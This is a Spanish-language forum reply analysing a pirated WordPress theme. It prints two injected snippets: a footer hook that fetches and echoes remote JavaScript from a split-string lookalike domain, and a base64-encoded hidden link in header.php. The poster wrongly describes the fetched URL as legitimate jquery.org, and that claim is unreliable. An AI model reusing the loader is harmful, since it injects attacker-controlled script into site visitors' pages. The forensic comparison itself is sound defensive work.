Hola, te respondi el privado, pero ya caigo que diste el enlace en el foro de donde los descargaste, ya descargue la version de zippyshare, voy a revisar esa, dame unos minutos y te digo si veo algo extraño
saludos
- - - Actualización- - -
Amigo @statica
ya revise, aca los resultados basados en un analisis rapido de comparar el codigo entre 4 versiones del mismo tema, obtenidas de fuentes diferentes, incluyendo la tuya
entre tu tema y una version supuestamente limpia que tengo corriendo en una intranet , tu tema lo unico que tiene de mas es en el archivo theme-functions.php, de la linea 126 a la 136, el siguiente codigo
if(!function_exists('wp_func_jquery')) {
function wp_func_jquery() {
$host = 'http://';
$jquery = $host.'c'.'jquery.org/jquery-ui.js';
$headers = @get_headers($jquery, 1);
if ($headers[0] == 'HTTP/1.1 200 OK'){
echo(wp_remote_retrieve_body(wp_remote_get($jquery)));
}
}
add_action('wp_footer', 'wp_func_jquery');
}
analizando eso, no parece sospechoso, arma una url para traerse un javascript de jquery.org, en apariencia no parece mal pues la url es legal, pero igual no me gusta, borra o ponle comentario a todas esas lineas y vuelve a probar
solo con lo que hice, no tengo elementos completos en este momento para determinar si el tema esta infestado, de la comparacion todo parece normal, seria cuestion de comparar con una version original que no tengo o comparar con otras versiones del mismo tema, ahi tendrias que saber un poco de programacion para detectar si el codigo modificado entre diferentes versiones esta bien o es malware, yo creo que tengo en algun sitio, otras versiones del este tema para analizarlas, pero no las encontre hoy cuando las busque, asi que me queda revisar en otro par de discos duros a ver si estan ahi
yo quitaria el codigo q te especifique y probar unos dias a ver
por otra parte, no estoy seguro si esta es la ultima version, en el changelog dice que la 2.2.1 es del 2014, casi anno y 10 meses de viejo respecto a hoy
la idea es trabajar con versiones limpias, originales es decir compradas y si es complicado comprarlas, al menos participar en alguna conjunta de un tema que te interese, tienes acceso al tema original y la ultima version siempre que el organizador mantenga la seriedad sobre la compra efectuada
uno de los que te pasaron como limpio, ese si esta infestado
busca el archivo header.php, linea 11
<body id="top" <?php body_class(); ?>><?php $xml='PGRpdiBzdHlsZT0icG9zaXRpb246IGFic29sdXRlOyB0b3A6IDBweDsgbGVmdDogLTcwMDBweDsiPlRlbXBsYXRlcyBieSA8YSB0YXJnZXQ9Il9ibGFuayIgaHJlZj0iaHR0cDovL2JpZ3RoZW1lLm5ldC8iPkJJR3RoZW1lIE5FVDwvYT48L2Rpdj4='; echo base64_decode($xml);?>
hasta aqui esta bien <body id="top" <?php body_class(); ?>>
pero todo lo que hay detras de eso, parece estar de terapia, habria que desencriptar ese codigo a ve que es, pero solo con estar en alguna de las versiones comparadas y en otras no, ya es suficiente para catalogar eso como malware,es mi opinion de este codigo